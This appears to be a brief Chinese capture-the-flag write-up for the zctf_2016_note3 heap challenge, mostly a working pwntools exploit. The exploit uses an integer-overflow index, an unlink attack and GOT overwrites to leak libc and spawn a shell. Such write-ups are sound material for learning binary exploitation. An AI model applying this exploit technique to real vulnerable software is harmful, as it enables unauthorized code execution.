整数溢出unlink

zctf_2016_note3

整数溢出的unlink，在edit功能里面造成了整数溢出

，这个题目的排布也很神奇，原本在heap[-1]处就存在一个堆指针。。。。

所以溢出成-1大小是无限的

exp

#coding:utf8
from pwn import *
 
#r = process('./zctf_2016_note3')
r = remote('node4.buuoj.cn',26250)
elf = ELF('./zctf_2016_note3')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
atoi_got = elf.got['atoi']
free_got = elf.got['free']
puts_plt = elf.plt['puts']
heap_0_ptr_addr = 0x00000000006020C8
 
def add(size,content):
   r.sendlineafter('option--->>','1')
   r.sendlineafter('(less than 1024)',str(size))
   r.sendafter('content:',content[0:size-1])
 
def edit(index,content):
   r.sendlineafter('option--->>','3')
   r.sendlineafter('Input the id of the note:',str(index))
   r.sendafter('Input the new content:',content)
 
def delete(index):
   r.sendlineafter('option--->>','4')
   r.sendlineafter('Input the id of the note:',str(index))
 
#0
add(0x100,'a'*0x100)
#1
add(0x100,'b'*0x100)
#2
add(0x10,'c'*0x10)
#3
add(0x10,'c'*0x10)
#4
add(0x10,'c'*0x10)
#5
add(0x10,'c'*0x10)
#6
add(0x10,'c'*0x10)
#让heaps[-1]为heaps[0]
#gdb.attach(sh)
delete(0)
add(0x100,'a'*0x100)
#gdb.attach(sh)

#现在，通过让index为-1，就可以溢出chunk0
payload = p64(0) + p64(0x101)
payload += p64(heap_0_ptr_addr - 0x18) + p64(heap_0_ptr_addr - 0x10)
payload = payload.ljust(0x100,'a')
payload += p64(0x100) + p64(0x110)
payload += '\n'
edit(0x8000000000000000 - 0x10000000000000000,payload)
#unlink
delete(1)
edit(0,p64(0) * 3 + p64(free_got) + p64(atoi_got) *2 + '\n')
#修改free的got表为puts的plt表
edit(0,p64(puts_plt)[0:7] + '\n')
#泄露atoi地址
delete(1)
r.recvuntil('\n')
atoi_addr = u64(r.recv(6).ljust(8,'\x00'))
libc_base = atoi_addr - libc.sym['atoi']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
#修改atoi的got表为system地址
edit(2,p64(system_addr)[0:7] + '\n')
#getshell
r.sendlineafter('option--->>','/bin/sh\x00')
 
r.interactive()